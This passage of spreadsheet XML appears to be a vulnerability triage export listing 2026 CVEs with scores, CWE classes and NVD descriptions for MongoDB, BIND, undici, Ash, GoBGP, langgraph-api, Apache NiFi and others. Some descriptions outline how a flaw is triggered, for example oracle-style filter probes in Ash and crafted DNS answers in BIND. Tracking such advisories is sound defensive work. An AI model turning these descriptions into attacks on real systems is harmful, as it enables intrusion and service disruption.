          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1031" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1031" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82063</t>
        </is>
      </c>
      <c r="D1031" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E1031" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1031" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1031" s="5" t="inlineStr"/>
      <c r="H1031" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1031" s="5" t="inlineStr"/>
      <c r="J1031" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1031" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L1031" s="5" t="inlineStr"/>
      <c r="M1031" s="5" t="inlineStr"/>
      <c r="N1031" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1031" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1031" s="5" t="inlineStr"/>
      <c r="Q1031" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1031" s="5" t="inlineStr">
        <is>
          <t>A use-after-free security issue in the cursor management component of MongoDB Server allows an authenticated user to cause a denial of service. Under specific timing conditions during cursor operations, a stale pointer to a freed resource may be retained and subsequently dereferenced during cursor cleanup, leading to a server process crash.</t>
        </is>
      </c>
      <c r="S1031" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82063</t>
        </is>
      </c>
    </row>
    <row r="1032">
      <c r="A1032" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1032" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1032" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82290</t>
        </is>
      </c>
      <c r="D1032" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E1032" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1032" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1032" s="5" t="inlineStr"/>
      <c r="H1032" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1032" s="5" t="inlineStr"/>
      <c r="J1032" s="5" t="inlineStr"/>
      <c r="K1032" s="5" t="inlineStr"/>
      <c r="L1032" s="5" t="inlineStr"/>
      <c r="M1032" s="5" t="inlineStr"/>
      <c r="N1032" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1032" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P1032" s="5" t="inlineStr"/>
      <c r="Q1032" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1032" s="5" t="inlineStr">
        <is>
          <t>Chainlit through 2.12.0 fails to validate ownership of feedback records in PUT and DELETE endpoints. Authenticated attackers can delete or modify other users' feedback by supplying arbitrary feedback identifiers, corrupting human-rating data used for model evaluation.</t>
        </is>
      </c>
      <c r="S1032" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82290</t>
        </is>
      </c>
    </row>
    <row r="1033">
      <c r="A1033" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1033" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1033" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86338</t>
        </is>
      </c>
      <c r="D1033" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E1033" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1033" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G1033" s="5" t="inlineStr"/>
      <c r="H1033" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1033" s="5" t="inlineStr"/>
      <c r="J1033" s="5" t="inlineStr"/>
      <c r="K1033" s="5" t="inlineStr"/>
      <c r="L1033" s="5" t="inlineStr"/>
      <c r="M1033" s="5" t="inlineStr"/>
      <c r="N1033" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1033" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1033" s="5" t="inlineStr"/>
      <c r="Q1033" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="R1033" s="5" t="inlineStr">
        <is>
          <t>Ash field_policies are documented to protect against filter-based information disclosure: when a field the actor may not see is referenced in a filter, it is replaced with an expression that evaluates to nil, so a filter cannot be used as a yes/no oracle to read a value the actor cannot see.
This nilling was applied to attributes but not to calculations or aggregates. A user-supplied filter reference to a calculation or aggregate carries an Ash.Query.Calculation / Ash.Query.Aggregate struct, which the authorizer's reference replacement did not match (it only matched the Ash.Resource.* structs), so the filter ran against the real value.
As a result, an actor whose field policies forbid a calculation or aggregate can still filter by it (for example filter(secret_calc == "x") or filter(comment_count == n)) and learn the value from whether rows match — an oracle that recovers field-policy-protected values one probe at a time. Filtering is commonly exposed to lower-privileged actors (for example via AshGraphql or AshJsonApi filter arguments), which is exactly the surface field policies are meant to protect.
The fix routes filter references to calculations and aggregates through the same field-policy nilling as attributes.
This issue affects ash: from 2.11.0-rc.0 before 3.33.4.</t>
        </is>
      </c>
      <c r="S1033" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86338</t>
        </is>
      </c>
    </row>
    <row r="1034">
      <c r="A1034" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1034" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1034" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16435</t>
        </is>
      </c>
      <c r="D1034" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1034" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1034" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1034" s="5" t="inlineStr"/>
      <c r="H1034" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1034" s="5" t="inlineStr"/>
      <c r="J1034" s="5" t="inlineStr"/>
      <c r="K1034" s="5" t="inlineStr"/>
      <c r="L1034" s="5" t="inlineStr"/>
      <c r="M1034" s="5" t="inlineStr"/>
      <c r="N1034" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1034" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1034" s="5" t="inlineStr"/>
      <c r="Q1034" s="5" t="inlineStr">
        <is>
          <t>CWE-650</t>
        </is>
      </c>
      <c r="R1034" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 is affected by an authentication bypass vulnerability when using XD or Intelligent-Management features.</t>
        </is>
      </c>
      <c r="S1034" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16435</t>
        </is>
      </c>
    </row>
    <row r="1035">
      <c r="A1035" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1035" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1035" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18149</t>
        </is>
      </c>
      <c r="D1035" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1035" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1035" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G1035" s="5" t="inlineStr"/>
      <c r="H1035" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1035" s="5" t="inlineStr"/>
      <c r="J1035" s="5" t="inlineStr"/>
      <c r="K1035" s="5" t="inlineStr">
        <is>
          <t>nodejs:undici</t>
        </is>
      </c>
      <c r="L1035" s="5" t="inlineStr"/>
      <c r="M1035" s="5" t="inlineStr"/>
      <c r="N1035" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1035" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1035" s="5" t="inlineStr"/>
      <c r="Q1035" s="5" t="inlineStr">
        <is>
          <t>CWE-772</t>
        </is>
      </c>
      <c r="R1035" s="5" t="inlineStr">
        <is>
          <t>undici's retry handler can leave an already-exposed response body pending forever. When a server returns a successful response that declares a Content-Length, sends only part of the body, and closes the connection, the retry handler retries the request. If the retry returns a non-retryable status such as 400, the handler forwards that new response downstream and replaces its internal response stream, but the original response body that the application still holds is never ended or destroyed. As a result calls that read that body never settle, and the configured body timeout does not fire because its timer is tied to the connection parser rather than the orphaned body. An attacker-controlled server can trigger this with two short responses without keeping a connection open, and repeated requests accumulate pending promises and streams that can exhaust application concurrency or memory. This affects undici versions from 7.11.0 up to 7.29.1 and from 8.0.0 up to 8.10.2. Users should upgrade to undici 7.29.1 or 8.10.2.</t>
        </is>
      </c>
      <c r="S1035" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18149</t>
        </is>
      </c>
    </row>
    <row r="1036">
      <c r="A1036" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1036" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1036" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19662</t>
        </is>
      </c>
      <c r="D1036" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1036" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1036" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1036" s="5" t="inlineStr"/>
      <c r="H1036" s="5" t="inlineStr"/>
      <c r="I1036" s="5" t="inlineStr"/>
      <c r="J1036" s="5" t="inlineStr"/>
      <c r="K1036" s="5" t="inlineStr"/>
      <c r="L1036" s="5" t="inlineStr"/>
      <c r="M1036" s="5" t="inlineStr"/>
      <c r="N1036" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1036" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1036" s="5" t="inlineStr"/>
      <c r="Q1036" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1036" s="5" t="inlineStr">
        <is>
          <t>An attacker may be able to cause a `named` resolver to abort. The attack requires inducing the victim resolver to send multiple queries for a DNSSEC-signed zone hosted by an authoritative server under the control of the attacker. If the auth responds with a particular sequence of crafted answers, and those answers arrive in a particular order with particular timing, the `named` resolver will encounter a use-after-free bug, and abort.
This issue affects BIND 9 versions 9.11.0 through 9.18.50, 9.20.0 through 9.20.27, 9.11.3-S1 through 9.18.50-S1, and 9.20.9-S1 through 9.20.27-S1.</t>
        </is>
      </c>
      <c r="S1036" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19662</t>
        </is>
      </c>
    </row>
    <row r="1037">
      <c r="A1037" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1037" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1037" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19941</t>
        </is>
      </c>
      <c r="D1037" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1037" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1037" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1037" s="5" t="inlineStr"/>
      <c r="H1037" s="5" t="inlineStr"/>
      <c r="I1037" s="5" t="inlineStr"/>
      <c r="J1037" s="5" t="inlineStr"/>
      <c r="K1037" s="5" t="inlineStr"/>
      <c r="L1037" s="5" t="inlineStr"/>
      <c r="M1037" s="5" t="inlineStr"/>
      <c r="N1037" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1037" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1037" s="5" t="inlineStr"/>
      <c r="Q1037" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R1037" s="5" t="inlineStr">
        <is>
          <t>An inapplicable NSEC record may be accepted by a `named` resolver as proof that no wildcard exists, which could allow an attacker at the same or an upstream level of the zone name to mask the existence of a victim's wildcard record.
This issue affects BIND 9 versions 9.11.0 through 9.18.50, 9.20.0 through 9.20.27, 9.21.0 through 9.21.25, 9.11.3-S1 through 9.18.50-S1, and 9.20.9-S1 through 9.20.27-S1.</t>
        </is>
      </c>
      <c r="S1037" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19941</t>
        </is>
      </c>
    </row>
    <row r="1038">
      <c r="A1038" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1038" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1038" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49837</t>
        </is>
      </c>
      <c r="D1038" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1038" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1038" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1038" s="5" t="inlineStr"/>
      <c r="H1038" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1038" s="5" t="inlineStr"/>
      <c r="J1038" s="5" t="inlineStr"/>
      <c r="K1038" s="5" t="inlineStr"/>
      <c r="L1038" s="5" t="inlineStr"/>
      <c r="M1038" s="5" t="inlineStr"/>
      <c r="N1038" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1038" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P1038" s="5" t="inlineStr"/>
      <c r="Q1038" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1038" s="5" t="inlineStr">
        <is>
          <t>GoBGP is an open source Border Gateway Protocol (BGP) implementation in the Go Programming Language. Versions prior to 4.6.0 contain a BGP OPEN capability parsing issue where several concrete capability decoders may parse data from the full remaining capability buffer instead of the slice bounded by the declared capability length, `CapLen`. A malformed BGP OPEN message can cause bytes from a following capability to be interpreted as part of the current capability. The most security-relevant case is the 4-octet AS capability, where a capability with `CapLen == 0` may cause the parser to read bytes from the following capability as the 4-octet AS value. This parsed value may later affect peer AS validation during BGP session establishment. Version 4.6.0 patches the issue.</t>
        </is>
      </c>
      <c r="S1038" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49837</t>
        </is>
      </c>
    </row>
    <row r="1039">
      <c r="A1039" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1039" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1039" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49838</t>
        </is>
      </c>
      <c r="D1039" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1039" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1039" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1039" s="5" t="inlineStr"/>
      <c r="H1039" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1039" s="5" t="inlineStr"/>
      <c r="J1039" s="5" t="inlineStr"/>
      <c r="K1039" s="5" t="inlineStr"/>
      <c r="L1039" s="5" t="inlineStr"/>
      <c r="M1039" s="5" t="inlineStr"/>
      <c r="N1039" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1039" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P1039" s="5" t="inlineStr"/>
      <c r="Q1039" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="R1039" s="5" t="inlineStr">
        <is>
          <t>GoBGP is an open source Border Gateway Protocol (BGP) implementation in the Go Programming Language. Prior to version 4.7.0, GoBGP accepts a zero-length AS_PATH during UPDATE decoding and later panics while validating that attribute for a confederation eBGP peer. The vulnerable path is in the BGP UPDATE validator: a malformed UPDATE that should be rejected as a malformed AS_PATH instead reaches an unchecked `p.Value[0]` access, allowing a configured confederation eBGP peer to trigger a denial of service. Version 4.7.0 patches the issue.</t>
        </is>
      </c>
      <c r="S1039" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49838</t>
        </is>
      </c>
    </row>
    <row r="1040">
      <c r="A1040" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1040" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1040" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55235</t>
        </is>
      </c>
      <c r="D1040" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1040" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1040" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1040" s="5" t="inlineStr"/>
      <c r="H1040" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1040" s="5" t="inlineStr"/>
      <c r="J1040" s="5" t="inlineStr"/>
      <c r="K1040" s="5" t="inlineStr"/>
      <c r="L1040" s="5" t="inlineStr"/>
      <c r="M1040" s="5" t="inlineStr"/>
      <c r="N1040" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1040" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1040" s="5" t="inlineStr"/>
      <c r="Q1040" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R1040" s="5" t="inlineStr">
        <is>
          <t>langgraph-api implements the LangGraph API for rapid development and testing. Prior to 0.10.0, langgraph-api permits a run or cron to specify a relative webhook target that is delivered through an in-process loopback transport, and the authentication middleware treats that transport as internal without applying the authentication context used for external requests. In deployments that rely on per-user authorization to separate threads and runs, an authenticated user can direct a webhook to the server's own thread and run routes, allowing creation of a run on or modification of another user's thread and limited incorporation of the targeted thread's metadata into the created run record. The affected path requires webhook targets and per-user authorization boundaries; deployments that deliberately re-enable loopback delivery should restrict it to controlled same-process routes because those webhooks remain unauthenticated. This issue is fixed in version 0.10.0.</t>
        </is>
      </c>
      <c r="S1040" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55235</t>
        </is>
      </c>
    </row>
    <row r="1041">
      <c r="A1041" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1041" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1041" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70091</t>
        </is>
      </c>
      <c r="D1041" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1041" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1041" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1041" s="5" t="inlineStr"/>
      <c r="H1041" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I1041" s="5" t="inlineStr"/>
      <c r="J1041" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1041" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1041" s="5" t="inlineStr"/>
      <c r="M1041" s="5" t="inlineStr"/>
      <c r="N1041" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1041" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1041" s="5" t="inlineStr"/>
      <c r="Q1041" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R1041" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1041" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70091</t>
        </is>
      </c>
    </row>
    <row r="1042">
      <c r="A1042" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1042" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1042" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73449</t>
        </is>
      </c>
      <c r="D1042" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1042" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1042" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G1042" s="5" t="inlineStr"/>
      <c r="H1042" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1042" s="5" t="inlineStr"/>
      <c r="J1042" s="5" t="inlineStr"/>
      <c r="K1042" s="5" t="inlineStr"/>
      <c r="L1042" s="5" t="inlineStr"/>
      <c r="M1042" s="5" t="inlineStr"/>
      <c r="N1042" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1042" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1042" s="5" t="inlineStr"/>
      <c r="Q1042" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R1042" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with both 802.1X port authentication and the RADIUS proxy feature configured with dynamic authorization, a low-privileged attacker on an adjacent network segment who induces a RADIUS packet through a configured RADIUS proxy client can prevent RADIUS dynamic authorization messages, including Change-of-Authorization (CoA) and Disconnect-Requests as defined in RFC 5176, from being applied to locally authenticated 802.1X sessions.
This allows an endpoint session that a RADIUS server or network access control system has ordered disconnected to remain authorized on the network.
Both 802.1X port authentication with dynamic authorization and RADIUS proxy with dynamic authorization must be explicitly configured for a deployment to be exposed to this issue.
This issue was discovered internally by Arista, and the company is not aware of any malicious exploitation of this vulnerability in customer networks.</t>
        </is>
      </c>
      <c r="S1042" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73449</t>
        </is>
      </c>
    </row>
    <row r="1043">
      <c r="A1043" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1043" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1043" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77119</t>
        </is>
      </c>
      <c r="D1043" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1043" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1043" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1043" s="5" t="inlineStr"/>
      <c r="H1043" s="5" t="inlineStr"/>
      <c r="I1043" s="5" t="inlineStr"/>
      <c r="J1043" s="5" t="inlineStr"/>
      <c r="K1043" s="5" t="inlineStr"/>
      <c r="L1043" s="5" t="inlineStr"/>
      <c r="M1043" s="5" t="inlineStr"/>
      <c r="N1043" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1043" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1043" s="5" t="inlineStr"/>
      <c r="Q1043" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="R1043" s="5" t="inlineStr">
        <is>
          <t>A validly signed NSEC3 from an unrelated sibling zone may be accepted as an insecurity proof, downgrading a secure delegation and letting a forged unsigned answer through.
This issue affects BIND 9 versions 9.11.0 through 9.18.50, 9.20.0 through 9.20.27, 9.21.0 through 9.21.25, 9.11.3-S1 through 9.18.50-S1, and 9.20.9-S1 through 9.20.27-S1.</t>
        </is>
      </c>
      <c r="S1043" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77119</t>
        </is>
      </c>
    </row>
    <row r="1044">
      <c r="A1044" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1044" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1044" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80125</t>
        </is>
      </c>
      <c r="D1044" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1044" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1044" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1044" s="5" t="inlineStr"/>
      <c r="H1044" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1044" s="5" t="inlineStr"/>
      <c r="J1044" s="5" t="inlineStr"/>
      <c r="K1044" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1044" s="5" t="inlineStr"/>
      <c r="M1044" s="5" t="inlineStr"/>
      <c r="N1044" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1044" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P1044" s="5" t="inlineStr"/>
      <c r="Q1044" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R1044" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Certificate Validation vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S1044" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80125</t>
        </is>
      </c>
    </row>
    <row r="1045">
      <c r="A1045" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1045" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1045" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82561</t>
        </is>
      </c>
      <c r="D1045" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1045" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1045" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G1045" s="5" t="inlineStr"/>
      <c r="H1045" s="5" t="inlineStr"/>
      <c r="I1045" s="5" t="inlineStr"/>
      <c r="J1045" s="5" t="inlineStr"/>
      <c r="K1045" s="5" t="inlineStr"/>
      <c r="L1045" s="5" t="inlineStr"/>
      <c r="M1045" s="5" t="inlineStr"/>
      <c r="N1045" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1045" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1045" s="5" t="inlineStr"/>
      <c r="Q1045" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1045" s="5" t="inlineStr">
        <is>
          <t>Apache NiFi 1.5.0 through 2.11.0 provide REST API methods that replace the entire contents of a Process Group using a client-supplied flow definition, covering Process Group flow replacement together with versioned flow update and rebase operations. Framework authorization for these methods was limited to read and write privileges on the Process Group itself, unlike the corresponding asynchronous update request methods, which also authorize the components encapsulated in the Process Group along with referenced Controller Services, Parameter Contexts, and Parameter Providers. As a result of the missing authorization, an authenticated user with write access to a Process Group could supply a flow definition that modifies or removes components in descendant Process Groups protected by more restrictive access policies, and could bind components to Controller Services and Parameter Contexts without authorization for those referenced components. Existing verification checks limited the impact to stopped components, and the issue applies only to deployments that use component-level authorization policies, because the framework enforces write permissions as the security boundary. Upgrading to Apache NiFi 2.12.0 is the recommended mitigation, which applies consistent reference resolution and component authorization across Process Group replacement and versioned flow update methods</t>
        </is>
      </c>
